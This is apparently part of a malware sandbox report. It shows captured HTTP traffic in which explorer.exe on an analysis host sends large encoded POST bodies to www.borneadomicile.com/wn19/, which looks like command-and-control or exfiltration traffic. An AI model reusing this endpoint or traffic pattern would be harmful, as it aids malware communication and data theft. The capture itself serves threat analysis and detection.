74 62 30 4a 52 6f 42 5a 6b 50 59 6b 64 59 73 74 41 70 6a 32 54 38 50 47 69 71 6b 6f 53 4a 30 43 79 6c 69 53 7e 33 56 6e 38 70 57 39 53 52 7e 5a 73 34 75 67 38 53 28 70 7e 62 55 74 59 49 73 50 79 76 31 70 4b 33 49 74 63 71 32 65 30 55 34 73 47 32 79 45 6d 6c 33 48 38 34 70 57 6b 34 51 57 71 49 35 78 4e 4c 34 61 6c 68 37 63 61 6f 34 68 71 56 4a 73 67 67 41 2d 76 6c 63 6f 4d 50 33 50 70 45 50 78 57 76 73 71 31 56 69 71 57 2d 7a 61 67 6c 53 69 79 4b 71 44 6a 75 53 6c 65 41 38 68 42 45 62 48 4b 55 4c 78 51 74 35 74 4d 4a 44 58 68 35 37 45 6e 33 57 47 7a 5f 6e 4a 6c 5f 6a 61 6d 45 4c 62 61 30 46 70 57 64 52 51 30 39 4e 5f 41 4f 6a 67 35 67 77 46 52 4d 64 39 5a 64 28 31 75 65 52 53 76 32 5a 70 79 64 4e 74 35 7a 6c 50 57 66 6f 44 37 31 73 65 33 53 6d 7a 38 74 32 59 4f 6e 69 4b 51 6a 4e 42 4e 51 71 41 37 66 78 45 5a 74 4b 42 35 57 68 63 6f 68 61 4c 67 2d 6a 71 47 34 32 35 77 58 6d 79 7e 63 4a 30 72 34 62 58 56 54 6e 69 33 57 58 70 62 48 65 37 49 49 75 6a 51 30 34 55 62 33 57 74 78 42 6f 31 7a 47 75 38 67 48 38 70 72 4a 5a 4b 50 62 7a 56 39 6b 45 4c 68 43 56 6b 54 55 56 5f 4c 64 62 42 52 6c 79 61 71 69 41 53 53 37 6d 4f 71 4a 56 76 68 69 45 58 46 51 63 4c 6e 6f 6f 62 7a 35 73 50 33 76 43 5a 50 31 53 5f 54 44 4b 2d 6d 62 33 5f 4d 42 50 62 51 6f 78 38 4b 62 73 7a 67 72 46 6c 6c 47 7e 55 68 5f 53 39 41 4b 71 6d 50 72 42 6c 66 36 28 51 76 54 33 34 28 53 69 41 31 52 4e 43 33 5f 6c 4a 37 48 55 56 6d 78 4d 6b 52 37 75 7a 41 77 71 71 6a 66 61 61 77 68 6b 44 59 55 79 75 4b 41 45 79 30 58 6e 7a 51 66 51 4e 4b 5f 57 5f 38 37 54 74 50 36 36 61 4b 4d 7e 4c 45 44 4c 47 6c 63 51 42 71 4c 55 34 64 38 54 56 43 6f 54 35 7e 37 36 68 73 30 4a 62 4a 6e 36 52 6f 55 51 62 6f 62 55 61 48 72 33 62 42 73 4d 74 44 49 79 38 4d 64 36 51 4a 71 69 7a 49 76 67 42 64 6b 34 76 36 70 31 67 6e 45 70 2d 31 39 67 44 46 4b 6f 48 56 61 76 5f 59 5f 5a 53 45 41 78 43 30 76 62 41 63 4c 28 57 75 75 4f 5f 37 5f 39 52 77 32 76 33 42 71 48 54 30 59 5a 37 54 31 35 64 6d 54 36 6a 31 44 76 58 34 31 4a 67 49 58 52 46 65 56 43 64 37 62 7a 44 52 73 7a 48 45 47 5a 73 37 73 6f 75 45 75 46 48 31 37 76 4b 55 6c 7a 64 38 6c 4e 37 62 46 47 77 7a 50 76 63 64 67 55 6d 75 6b 31 69 34 47 33 30 57 65 7e 6f 77 31 6b 67 6e 53 4b 37 39 62 50 57 39 46 7a 45 6f 36 59 37 4d 6d 57 36 76 37 36 54 76 5f 49 6e 78 39 76 30 32 6f 54 71 55 71 61 37 4c 47 6b 59 64 39 50 68 6e 74 31 6c 69 4b 54 77 74 4f 64 5a 53 74 68 4b 48 50 55 31 79 74 57 61 43 32 37 4f 7a 79 34 72 6d 63 71 63 77 54 57 70 30 64 45 79 4f 33 4d 6c 57 42 57 64 67 52 62 31 7a 75 66 76 6e 56 71 73 34 49 76 44 68 44 37 56 77 36 48 47 70 46 6e 73 79 74 41 5a 6a 6f 28 4a 43 67 72 6e 56 79 6c 72 70 6d 4f 57 4d 62 36 75 48 68 76 69 38 48 6d 6e 7e 58 6d 37 73 66 71 64 32 49 66 53 46 6f 41 43 6a 56 53 4a 70 4e 53 6f 53 6e 45 76 4a 5f 39 59 71 31 36 52 28 66 6e 77 36 6e 57 57 39 63 50 6e 4e 53 67 46 72 73 52 2d 69 55 58 69 38 6e 68 45 61 6d 6a 42 54 59 4a 61 75 4f 51 66 35 71 41 33 30 51 4c 6b 4e 65 6b 6b 4b 61 7a 4a Data Ascii: AVnXAh=8a543gBy99QJyQ1FGQeMYCu1e7uO(QNFRZs2~aQwRcqxOvv2KLb8wyb_lw~XilwKAfbmPh6oE2VPMfeza0CGynp2(WytzlLDk7Epa8eLrwO8hgAfwJERXQxDwFrFP3WuCVBTatN8LO3gbWid3tv3cu~fZHUeX0ZFmGff9TSrHatWrfMiZpgdnTNhxtX-6NlBpovRo-Msy2uRfllSFTwTXuZ62fC-dO~qYaoB3h9qjvLuCdvPHH5R7TRPXvGeTDwRrDnWu66ZKz3XMZvIdFMLC-vWXTOEqocVyv4k1or9TzM57Ir1Keg0HO85VPnAqK6l3L3n07(yVy(idNnjrKvwVN0HGMYExwphrtSTrqgIh5dWKGpA3TpvoEGstb0JRoBZkPYkdYstApj2T8PGiqkoSJ0CyliS~3Vn8pW9SR~Zs4ug8S(p~bUtYIsPyv1pK3Itcq2e0U4sG2yEml3H84pWk4QWqI5xNL4alh7cao4hqVJsggA-vlcoMP3PpEPxWvsq1ViqW-zaglSiyKqDjuSleA8hBEbHKULxQt5tMJDXh57En3WGz_nJl_jamELba0FpWdRQ09N_AOjg5gwFRMd9Zd(1ueRSv2ZpydNt5zlPWfoD71se3Smz8t2YOniKQjNBNQqA7fxEZtKB5WhcohaLg-jqG425wXmy~cJ0r4bXVTni3WXpbHe7IIujQ04Ub3WtxBo1zGu8gH8prJZKPbzV9kELhCVkTUV_LdbBRlyaqiASS7mOqJVvhiEXFQcLnoobz5sP3vCZP1S_TDK-mb3_MBPbQox8KbszgrFllG~Uh_S9AKqmPrBlf6(QvT34(SiA1RNC3_lJ7HUVmxMkR7uzAwqqjfaawhkDYUyuKAEy0XnzQfQNK_W_87TtP66aKM~LEDLGlcQBqLU4d8TVCoT5~76hs0JbJn6RoUQbobUaHr3bBsMtDIy8Md6QJqizIvgBdk4v6p1gnEp-19gDFKoHVav_Y_ZSEAxC0vbAcL(WuuO_7_9Rw2v3BqHT0YZ7T15dmT6j1DvX41JgIXRFeVCd7bzDRszHEGZs7souEuFH17vKUlzd8lN7bFGwzPvcdgUmuk1i4G30We~ow1kgnSK79bPW9FzEo6Y7MmW6v76Tv_Inx9v02oTqUqa7LGkYd9Phnt1liKTwtOdZSthKHPU1ytWaC27Ozy4rmcqcwTWp0dEyO3MlWBWdgRb1zufvnVqs4IvDhD7Vw6HGpFnsytAZjo(JCgrnVylrpmOWMb6uHhvi8Hmn~Xm7sfqd2IfSFoACjVSJpNSoSnEvJ_9Yq16R(fnw6nWW9cPnNSgFrsR-iUXi8nhEamjBTYJauOQf5qA30QLkNekkKazJm4AbalLMhTHIHUYCUrE_K9wD9G4_Bwv9vROdM13oJ2vNhj7Zyxi45lR-8tVbdprzyTXi7mN1Qnwtsy3wma80IeV2nTts7HrkkZ1NG7BSHo3_KvGOOO6CpmdnHwo0mKQ8lAuQIhn0eMUbpLMdq0Jzs9VeuvDM7FVPW4CzI2bRy6EMj5bcb17sbLnyRTdJ1WwOW18u8YlRuEyUOKKyoRGtaAnCbeyGsDK722cOuFk54suaq8p-ZXP9zDkvzPdFfewZ2DKUwKcwrVY1DIC2D5YvuNDrsO(RMulu4wwfynzqR9M6ZxOiMWQqE3sL3F(5MTphKGb7lwiyWuebg7UxIrx4uugwn0I6i8K8hONVcIePC5TSMyDtZSYJa9Y3x3dy9jpffmVwzJMM3iBAu2a-ZfKcqUAAHT5NCeywhZflKLj88Sjvk61b83n1a6qnrSsIF7QJaBN7zf7Jo6s6qeX_fIPxiw7BH7DlNfFMNvsxkfQrkkLDW5FR(ZIXvfxhn8M_L1346qbgN5~_zXnf6bZPZ8A1ivkSQWLguYsk7qT5buRN~UWSzlD9NaP8REdNzQPhOLxGS0to9u9BZSOp8wz9NRvUbJqi1x93ZZH_o_1RfTZpf0MhCZQ3Bfv3GXpnKFgrD4bX41MPlFegkE~v8x3U7OfLMpEgFHY6kvnWEKgb6FI2JVmOLDxe~SC4JvFPORfab-LEkA7rreoqbqkwXG6mxnBCSCeu9_RuYGBKGdf7IIkw5X0TPt9Pk5JPXUdO75SaiOyq(HoSf80QhppsNawMN07mfbHPW3kaew(ekjFji6jWyqG4pUFjCyFjN0NsqwmL5P~aqR~3ECx6e6z3qi7ycBQebeLQ7BZJccfKdmz31oDFXvnNO6ZXCQQR8p(G3z68K4lPgAuM92KQmsBKHHJ-giaYbijv5eKRquNaOT6Vd2n_MNkHovX9mZO_X1ygBr4YBKZGMFxuqP9IQn0VopVYpzGwE0oFgjVL~cTBro4P73YELBOX~vTKKUu5zozcMo9xU9sNFG6irf1R1TNkof0SSWhwQOIruoqDAUVk5wh4aGFxvQwQLcND(LJKYKTfiyEglPijf7nEx4Xb0t41Y8Qysjj1zwtZgNs9xxa7drTduGeXdVxFiIxjyridzkZ9(LGnOvxC9XcauP93D42w5KPZTJNdKv4u4EEG5gL453oZ3C6kmMzdtQ9eWn7aK7KtJ4Ysg5mfvirCiGtA6vYrJc2GbShPJ7skG-w8Vv~m8NkJF1P5VyTeBEO_iAM9SChi8pwgldKTAAC1V-LfO_OHnoQyWQB4Wn~nim0rFY2h3OpmRZXhgAQlhcu5OItdevOpWGRpyHWYq6dqur~LAE9NKZ7RP9xlk-Ejt-zjUsMeioyh98KmlJiwzQmiHSvRL2oqUab2(M0daZpXrlHnR0r7Z3ad(nZVTybI~9K1w6FlL3SwLWgU(-4nrnSyNFojqaOJ49456e~R5xPjYPcaymN3BRMXjzIB5g9eTWFjVh3AXb93QKNUdJfZ7bDDVRiakaMYEI18kGx9gxFUFxk7y4DvWCx0noboNoifGnha8dGwQPZCHQWJn5QxFzet35VOfsY6~rSnuAzRSC~MVxnUyeIQ1GbiHGM056Db(w0L8gfmK-QsLpvPVCwiy4W8m6(Q(m0o2CjqafOIazoMDo1r(6hNW2N1ung97rdUPDUQUjfJF-eg37Mw2_TtXsEHYgYiucHayUM7bkb9pIUNycyTtA56E1AYR2iJhvptBrR-etc5LuVm17Hm16Dv99EKkvyVBlcICn8Npxrw95vSCGvVhCaCmNQ68FTYrLeEII6UQdCpDZpJSahwwUmvexwbO1X9w4slB-M2RSYZMpFz(mpREDfqulo8qxWd9S2wmAZ4D1kiOwe7fUfMiAcrnYIobzy4cl9n8aW5WZZDHi5lcvBt4bK_3_B14eAUgOi9mH0YTBQ5~AO1W_Zm5XNqU9DYYVkkmfUFKyg4pjJpC5nEBWdnSqWAO00usJzCsQtUbZj_zmvOSsYEa2RBHiYUqB~KMmlCBuGiySAdcC3SyusmQClt~BNwuOrxg9LOYBaJHLvzZrSliQkpOBO_YRqWeXw9QoKByM(Xp1eL3xWGjNBWKSuvGt2X39xv9l3oSrZJPcLFffYwybACY43aen90wpn7oKMqIhmVr2~qO7ppRm7tPRWsGnBA0SygIQZgWKr863inA03IaGIXHao1rxFjRkAbhzymfhKNs836(RQYUoD1all0pkDlL4GcaBME4DyVYHkYJtJiQzJ00G8JBWsvbynSsY~fe6JgKMUI28H2PJ88vFAbvj5m5gNSQDr5VK~eLokBGkCOvGs8BhDyT30P9wz8IO9sNnLnc64Nz0gKy1yaNQUWzIpj5j1FlvgQ2Dt3drp2LTZgIxeM3JSI69L28ieQTuWJIlA8tcYjtDoOqXIoGvJ4Fxl6jwZ_jb0ou36g61sndoy35OOIV5dunp4EVy5bCWnrZnQPqUFi1VmmNbJkOdscrz8M~mRWPHi6NbEiJHnBtsn5v7TAUcBekAcUMAAZoZ9xa-tsUOg5RroqXisNBmid1K~3h1uaNeZmonA_1sjdC-FqflKByIVCy-(MgE2xHQg9F3Onx9aJwfQpfR4XYoe3yqjzfdrev_TvVRfg5Db1kcTR6saKE1sbzMxpKaUq0naZrL5_Hbk76xJ-UU~PNl8hpXa4zqzwF_TY(mSpoANOtVm3q0t

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49769	217.160.0.18	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 10, 2022 14:25:23.516134024 CEST	9373	OUT	POST /wn19/ HTTP/1.1 Host: www.borneadomicile.com Connection: close Content-Length: 227520 Cache-Control: no-cache Origin: http://www.borneadomicile.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.borneadomicile.com/wn19/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 41 56 6e 58 41 68 3d 49 66 68 31 75 65 64 70 75 42 49 76 6b 78 69 55 6a 64 76 6e 64 73 4d 4f 6c 2d 73 4d 67 66 76 47 38 6b 59 32 38 70 55 4d 47 51 65 6c 77 70 62 2d 33 4e 56 33 39 30 62 51 32 76 61 42 70 33 4b 53 4f 4b 6d 56 68 4c 53 37 39 45 57 74 48 79 63 32 4a 67 32 6c 59 58 6b 38 4a 69 6f 53 54 79 6d 6a 35 6b 54 36 30 54 65 74 77 72 50 47 59 76 71 4c 31 77 32 66 61 53 55 6e 6d 39 68 50 5a 4d 37 56 43 50 51 51 79 78 34 30 7a 6f 65 43 76 67 65 65 49 6d 48 45 52 6f 62 6c 45 4c 43 66 32 4e 6d 61 46 2d 44 73 43 63 65 67 4f 46 44 4f 4a 71 38 5f 46 4e 34 4b 4b 36 28 48 4d 7a 63 6c 47 65 42 37 35 32 41 7a 37 73 62 37 32 2d 45 65 4d 55 46 33 28 7a 44 6d 78 56 57 43 76 45 68 5a 62 32 35 44 42 32 67 63 72 5a 58 4b 52 77 6e 75 52 44 68 64 63 68 48 48 6e 4e 6c 67 78 56 28 50 46 34 51 63 51 50 55 30 47 67 37 47 69 39 4e 45 66 77 50 39 75 79 76 31 4f 55 63 55 30 48 6f 65 34 69 4f 72 63 42 46 39 4b 47 53 34 4f 4b 59 55 44 61 5a 79 32 73 7e 4f 75 39 4c 51 6f 59 58 33 75 49 6d 37 46 52 52 74 78 58 4a 69 49 62 49 66 62 6f 71 32 5a 58 45 37 54 65 46 65 75 5a 4f 6d 33 6e 39 36 6e 6f 69 38 4b 57 5a 69 47 59 64 4a 64 59 54 57 52 31 75 79 44 50 78 55 46 31 52 64 4b 77 4f 68 6c 54 32 2d 59 53 34 33 56 38 79 7a 6b 55 41 34 39 74 37 49 4b 73 32 59 68 39 66 66 62 64 7a 57 4c 36 48 51 52 71 74 4a 71 51 41 41 30 2d 57 39 52 62 43 68 4f 36 4f 38 6c 4a 72 46 6f 69 72 43 71 68 7a 5a 7e 7a 70 76 56 44 62 52 4b 42 7a 57 73 30 51 67 6b 71 48 69 38 4e 69 35 71 66 6b 35 52 62 4e 77 30 31 73 42 33 55 45 64 62 31 38 41 32 2d 51 6f 4a 42 68 5f 6f 35 52 6e 44 41 59 73 77 75 77 57 39 31 50 63 38 55 6a 53 36 78 4e 4b 34 43 4c 45 6e 68 30 6a 42 34 62 6e 41 4a 32 4b 7e 6c 6f 49 69 70 4e 59 35 6e 72 78 57 74 55 45 79 66 46 2d 71 37 32 65 50 75 66 39 35 48 34 51 7e 47 45 37 66 4b 78 76 42 78 4c 44 52 45 77 41 62 5f 69 2d 7e 62 37 30 38 57 6a 78 5a 2d 78 4a 59 6b 33 44 48 64 38 49 4a 67 6a 42 4d 4f 35 49 56 37 4c 48 79 37 4c 34 30 4a 67 42 50 7a 34 4f 53 43 77 33 58 73 66 73 56 75 58 67 50 4a 43 2d 69 76 30 31 63 68 62 34 54 62 77 58 49 59 6b 5f 6e 67 34 38 69 65 73 41 39 58 57 78 76 36 6e 58 70 30 62 45 32 59 4f 72 7a 58 62 56 56 77 66 59 6a 68 45 6d 33 54 6b 77 4f 66 31 45 72 79 56 38 7e 4b 54 44 5a 79 42 6c 6a 43 66 65 77 5a 50 4a 35 5a 34 65 39 6c 78 42 75 43 48 61 62 55 56 33 56 74 65 4c 76 64 55 61 63 47 41 4c 42 39 63 63 75 46 63 2d 63 5a 74 69 6a 79 4b 61 66 49 31 73 4b 39 30 71 69 78 75 46 5a 69 74 5f 33 53 55 4f 6b 4f 77 38 30 42 71 30 61 49 72 58 77 4e 75 4a 34 56 56 2d 37 4f 47 51 7a 30 4c 35 50 71 39 4d 47 6e 4f 69 58 49 61 75 56 4a 67 36 79 32 46 33 49 4f 77 41 41 35 67 63 6d 4e 4d 33 5a 48 73 74 76 67 6e 61 33 4b 51 37 57 61 42 30 65 57 69 6f 66 59 38 74 50 38 62 50 46 76 64 7a 38 6f 45 37 4e 45 4c 4f 59 44 66 32 53 4e 59 44 47 34 7e 4e 54 68 4e 69 4a 67 4a 35 55 47 46 34 72 76 7e 51 68 61 50 48 51 49 6e 55 4c 33 56 73 45 52 58 6c 48 4a 35 41 37 54 6d 6c 59 38 74 2d 43 48 39 48 37 32 43 2d 50 35 33 73 43 70 37 78 47 39 45 45 79 74 79 30 30 53 43 66 73 46 62 7a 41 44 33 59 64 63 4b 7a 45 2d 42 32 4c 52 6f 67 75 66 53 38 48 6e 33 76 67 35 5a 67 6c 59 4d 64 6f 5f 79 71 30 33 61 6f 5a 77 32 4b 39 41 52 4f 38 63 55 55 6e 42 77 7a 68 4c 6e 51 47 64 72 75 51 53 49 6e 6c 76 58 59 63 52 45 6a 4e 69 33 47 63 33 71 71 70 70 64 74 74 69 74 66 34 71 7a 76 66 72 50 53 74 52 51 58 4a 62 78 47 41 54 79 51 54 63 61 6f 55 54 55 42 7a 55 62 31 37 74 31 6a 73 69 51 72 66 37 53 54 6b 4e 28 6d 4f 4d 6c 4c 36 65 28 4d 79 67 48 78 5a 46 45 72 47 44 71 43 5a 54 54 61 35 38 57 30 30 4c 42 71 57 34 31 6c 31 47 76 38 47 76 41 76 77 45 79 7a 45 7a 4b 77 73 72 64 37 6c 6c 55 59 63 5a 42 41 6c 73 50 71 62 34 6a 6e 32 48 74 65 55 51 74 48 69 51 46 50 79 78 57 50 45 4e 6e 6c 30 59 47 73 47 78 48 79 69 79 54 64 6a 34 4d 7a 6c 35 38 45 46 77 79 51 5a 4b 4c 6d 58 45 50 6f 53 31 51 6b 4e 37 4d 65 58 44 34 52 6f 4c 6a 70 49 5a 57 68 62 7a 59 47 4e 44 33 2d 6d 7a 49 6a 31 35 53 5a 6b 48 56 4f 41 32 28 33 42 37 31 30 53 59 5a 47 4c 44 71 58 69 74 43 6f 32 4d 67 50 41 45 6e 68 67 61 62 55 50 67 48 77 63 4c 4e 48 32 69 61 75 48 47 6b 43 75 69 47 72 4d 6e 65 44 39 32 74 6f 51 47 73 61 Data Ascii: AVnXAh=Ifh1uedpuBIvkxiUjdvndsMOl-sMgfvG8kY28pUMGQelwpb-3NV390bQ2vaBp3KSOKmVhLS79EWtHyc2Jg2lYXk8JioSTymj5kT60TetwrPGYvqL1w2faSUnm9hPZM7VCPQQyx40zoeCvgeeImHERoblELCf2NmaF-DsCcegOFDOJq8_FN4KK6(HMzclGeB752Az7sb72-EeMUF3(zDmxVWCvEhZb25DB2gcrZXKRwnuRDhdchHHnNlgxV(PF4QcQPU0Gg7Gi9NEfwP9uyv1OUcU0Hoe4iOrcBF9KGS4OKYUDaZy2s~Ou9LQoYX3uIm7FRRtxXJiIbIfboq2ZXE7TeFeuZOm3n96noi8KWZiGYdJdYTWR1uyDPxUF1RdKwOhlT2-YS43V8yzkUA49t7IKs2Yh9ffbdzWL6HQRqtJqQAA0-W9RbChO6O8lJrFoirCqhzZ~zpvVDbRKBzWs0QgkqHi8Ni5qfk5RbNw01sB3UEdb18A2-QoJBh_o5RnDAYswuwW91Pc8UjS6xNK4CLEnh0jB4bnAJ2K~loIipNY5nrxWtUEyfF-q72ePuf95H4Q~GE7fKxvBxLDREwAb_i-~b708WjxZ-xJYk3DHd8IJgjBMO5IV7LHy7L40JgBPz4OSCw3XsfsVuXgPJC-iv01chb4TbwXIYk_ng48iesA9XWxv6nXp0bE2YOrzXbVVwfYjhEm3TkwOf1EryV8~KTDZyBljCfewZPJ5Z4e9lxBuCHabUV3VteLvdUacGALB9ccuFc-cZtijyKafI1sK90qixuFZit_3SUOkOw80Bq0aIrXwNuJ4VV-7OGQz0L5Pq9MGnOiXIauVJg6y2F3IOwAA5gcmNM3ZHstvgna3KQ7WaB0eWiofY8tP8bPFvdz8oE7NELOYDf2SNYDG4~NThNiJgJ5UGF4rv~QhaPHQInUL3VsERXlHJ5A7TmlY8t-CH9H72C-P53sCp7xG9EEyty00SCfsFbzAD3YdcKzE-B2LRogufS8Hn3vg5ZglYMdo_yq03aoZw2K9ARO8cUUnBwzhLnQGdruQSInlvXYcREjNi3Gc3qqppdttitf4qzvfrPStRQXJbxGATyQTcaoUTUBzUb17t1jsiQrf7STkN(mOMlL6e(MygHxZFErGDqCZTTa58W00LBqW41l1Gv8GvAvwEyzEzKwsrd7llUYcZBAlsPqb4jn2HteUQtHiQFPyxWPENnl0YGsGxHyiyTdj4Mzl58EFwyQZKLmXEPoS1QkN7MeXD4RoLjpIZWhbzYGND3-mzIj15SZkHVOA2(3B710SYZGLDqXitCo2MgPAEnhgabUPgHwcLNH2iauHGkCuiGrMneD92toQGsaqVooNA8bkH90ktPBXXluIIg6a_bG8sAyM4cuQ8p4MLRYJHvZtX1mFwz2SXG2ZAstVBtfhwrisgKKDvuDXY9i9n95Wj2fSTqNQ-19xFY0UocH1LaZ1wWbLqNLti7-pPQJIO9Z94gU9jOvpkTGh9VsYfMs6kGNdfZNzWRfP8FR2J76N1DE9ZSwwdpHMQfKhjQnBluMYejhAdhbF0(3VIuuM0~A1A7tYnR4LDnP5wXCrVkRhs~ehZ8XDGe6Ctyk5C~IpfZoDwcA3lbWkoX2jA2Mt1Rj3cKZ2SS2Qme4RUn_hqApsdEM3hfk0W(QthQ7dJd46gWKy17vz-Sos9f2J4j1JVbU~shzNmu1hpm4GCiYf6kwbCYdQbVvCSuC1h4fsASA9r2ctLfJg6MjFIkDMqUc2nMZxq9fatxpRsR6m_rjv6m84whtdgKOmzZV64jgl4owWOqtKXvQzaIMgA56K3KY~iYRkgSIZqHbeP4q3ZlR22pFQLRST0eLuiZqtvwKliKLEgKYR4uVJLsbUW3mgjD7MbBIXjJL9Rrf3RxR7R0dycqJRI9A5JCv2O4mxt6Jb98hh825tC4PoVFd(ceEcF~CT8w_jUcgzsxGvyTFCh60lEv0KIHjVDcY3mwW0xXXu_FpM0dzTZaxayyQrhmyr1EoOaElRqT0PWrYAjq26AO93r9gR5kJg2as9YseHao2ZBEL(4I7YblxTYybTnQ5WmiRRCIkgp7VnxDCkEorGKhYF4JAAm8-DdnigaHgBKiZ27Gw5idUWRRdZ-dGcKqH(YMw4qLJyNQ8WdwjxmjOVYcQ8RgBOv(IKBM9HJzCi9HDrC(2O0QTB9GJi7dYo_ElRV7xKyOzNEYC4GBz5-8C5dArJt~Vk9k4zBSGshuY1FPCGnV6R4BcKLBDsvP1luY5B7GPUk~4yK(zDBwW4nEf73bOc1cs7-QLdrnICHgvaMfi0K(ZdLKxhc1X0ZbgoR86aINDii8XGhZlbF1KYd~V(CSfzO0MlzeFjm6_WqqoLeXISqqonjwMCg(loeBdPkCdWVX3ffRLY0xlmCNyXmfIgULf(nVEcVZSjLo1OipXawDnVpiWkhxL~wGdsksMqKBZscIMqlQYL186qSydZTftVt3zyfDOEhmYM6YljhpHYaPBv2do9ZH-(YOTp06yG35On_n3AXzwWcl6W12k0QtIb3R1zURkZidS0p5ONqEiJf5EErodk63mc4D-(qSud59K0HSv3ZCHdKTkVVcieQ2eS5MFHq2tRT31VPf79onm6d(oc9HC2xV_C08ut1o5wiRHsPFbcyyix5siuNPb4HzfLRck9WkzspW5JMXJnN9SOZ4R7hJoafcjfXKyRyzZjcnIXkPfxDpflv(GPYGoVikzWfo_n8p4a3iblAtifvyr~FQHMkmuchIyNPaRbLL-BKTDhZz6iGB5UODITXjnnD9VRXbyhOp_FgISqKFyuuqvIUWQsnPup7lpJAkviThuOBTe4yhCvkUIlI8pnNC0Gb~M41PPgLmDfopdDmlRXDEPfYtarCJ6Y3exrJhOkhmhzLX7PfOx6sruyi1z~laq2YeY4jv4flfITJknlJZh(qqkb17wIdxBn-uOJKdU6dX6NjqPNhc6JZNoe8swcAtKfuWkEL(NVTbWu-hEWXXCs1z_rPuP72W5bcLK7iBgRPXpxIZbgPAaVk1fIxDI7m38GAwIHaroo0R0tHULxXlz8aurco~oSjke9qVYji7YR-LmhLAgGw(y~rLF7ikiQ90Z23HzyHUMAswj6tk9RfyRuWQv6vmcC9mIJREst8c9q9N2fGsjxaCcZi3Zz4AFHCNz26YTizXRliBwejc3y3VBVrorbvtsCtCSKHITfeDIVYbiUXE8iYPW8gAfefzMNhybAZ(rvEWtpKWCjrb5FlY2EA9IM_5cC-PFz_pweu9sUUzUPKe1ASKe(XfqJRVgV0d7PF(6UsAMeBnXw2YKwtLhF4J5RdTjxUjfyivoZagRUTJ7OVDHFnTB~WWGx6mnWktdSdkl7FPRSeyx0TQsWJm5mTBmX6jGaE7zEty7HpWt7v(2TZgMzhIwSFpblUrlRpfB5tPidIECq2p1S4vT5EF4z3LtPmHJCqwSSSeIZfJSPAme1VSU8QFai1vGQwTBcnAvztftMU77Q_AToxrQNhhV01C91SMymg9ATe8wwRAsG6o3OwW5JJb-sqdkKgj1FsWKnUNw2_K9b0oTcVo_shMGOGrj987hFxrMv9z35WpYz72nlXZ9y2ut9Q1EFPiSDBKp7PJOZl9nnuOKBGm7CBf6s2mP4VOBil5mcAmRA4nYQqIQ0CU6tGH7nExO9aWSoCh69W3u0bUI14R1glaciOpQsecHAv(1SJcsRei7ukvOlPONEnspg94kS4fvb16M3ukiSLWw8jZ-J7kCNvfZF6mHJYzKZj7Te9zDSWXto5T3nC4l~ANbc_dsZyxB2pXyln2AodF6FQXMVrGWp7hRE_8WdIcP7UkfN3VhBvZEh2kndpefwqpbqBR6VLP8yZw567yoQILBhn2dplj-Fyy6KZ01nb3uCEGQ066E1swVeTsO97TCj7Trjb8AFn9MeRG1Saj3XGeD3v4R9MlGhpESkY~-vd7I(x5H3UnBQftfCzR8TACmn1jNRolFeI1e50d6N0AKfUdIb48gF9~JcF2LzGj9qyDJZ4MOlPIAT3G3fNHcQMMyqakfKuLOqiZ3gsUuD4zW~kD
May 10, 2022 14:25:23.516216993 CEST	9379	OUT	Data Raw: 6b 74 6f 71 37 59 6c 64 50 42 72 61 28 31 33 32 68 5a 54 48 64 68 77 4b 76 55 6e 4f 35 69 5a 4d 50 41 48 34 31 50 35 67 47 6b 62 43 52 65 6f 31 4c 73 5a 77 30 2d 49 5f 65 72 55 78 41 79 53 71 66 52 63 50 31 58 51 4a 32 5a 32 35 6c 44 49 38 72 35 Data Ascii: ktoq7YldPBra(132hZTHdhwKvUnO5iZMPAH41P5gGkbCReo1LsZw0-I_erUxAySqfRcP1XQJ2Z25lDI8r5WQHRYUEhbEJT~LPOKuRGadj6LMcrNpaK(wEjVjIqab6uDNDyzPaM2f9xYrB4OLsedtTj674l2diGtgGjQOP93KoxHPd_RgD1Tq85lHVqR2e8owfJhYgbZ7hoq48rpI8xGy8l3RIHEGEgGwb4Eaw4Ue6G8oy_8SS_2
May 10, 2022 14:25:23.529161930 CEST	9382	OUT	Data Raw: 7a 66 38 50 34 65 61 32 34 39 4d 62 79 30 39 39 79 52 61 50 69 30 56 62 50 75 33 39 65 52 71 52 67 54 36 39 74 6d 4f 65 56 70 62 57 4c 6b 50 4a 57 65 43 6b 55 61 51 6e 69 65 35 6a 4e 4c 28 6b 78 52 41 64 32 77 68 70 68 41 55 50 72 42 59 65 28 55 Data Ascii: zf8P4ea249Mby099yRaPi0VbPu39eRqRgT69tmOeVpbWLkPJWeCkUaQnie5jNL(kxRAd2whphAUPrBYe(UqK76pjV0jMMOke(gJjrRtkVpkAwyqCwfkxgGVG56UPLtNb2SFaIUZRbBivWUiFVSR2Ub0eVzXywTb9IuaO7VDYt0cQCVlBeMcOgHKn3MFUmnMpfAy6iNY9yJx-4G4G5yQaxxTRXmqB~TyCFB~qc0VEEPR-dIta3Kt
May 10, 2022 14:25:23.529289961 CEST	9390	OUT	Data Raw: 49 55 57 51 7e 61 70 70 41 66 56 69 53 63 70 63 43 4c 32 66 67 78 31 62 42 46 6c 7a 28 6a 28 6c 7e 76 74 75 7e 62 35 7a 77 73 64 6a 45 41 43 46 45 42 30 31 4e 4f 6f 54 30 45 35 66 45 65 71 7a 66 6f 45 58 43 72 4e 76 43 74 4e 5f 4a 48 54 41 76 76 Data Ascii: IUWQ~appAfViScpcCL2fgx1bBFlz(j(l~vtu~b5zwsdjEACFEB01NOoT0E5fEeqzfoEXCrNvCtN_JHTAvvuqbT0YYHOcdDTLFWhR4nml5QjUeA5E(lZcl2PHtOAKPi6wdifG94mmcFRTtJIL8HG5Oqpvb8lNQiIpT0Y5j_uKBB2I9nnhJ-ucPH~d7QdGulpN0MVeEB6QZExWqLCFCRkmyywUdKM3fZ5zaChx~EjH3eJPCf9hBLA
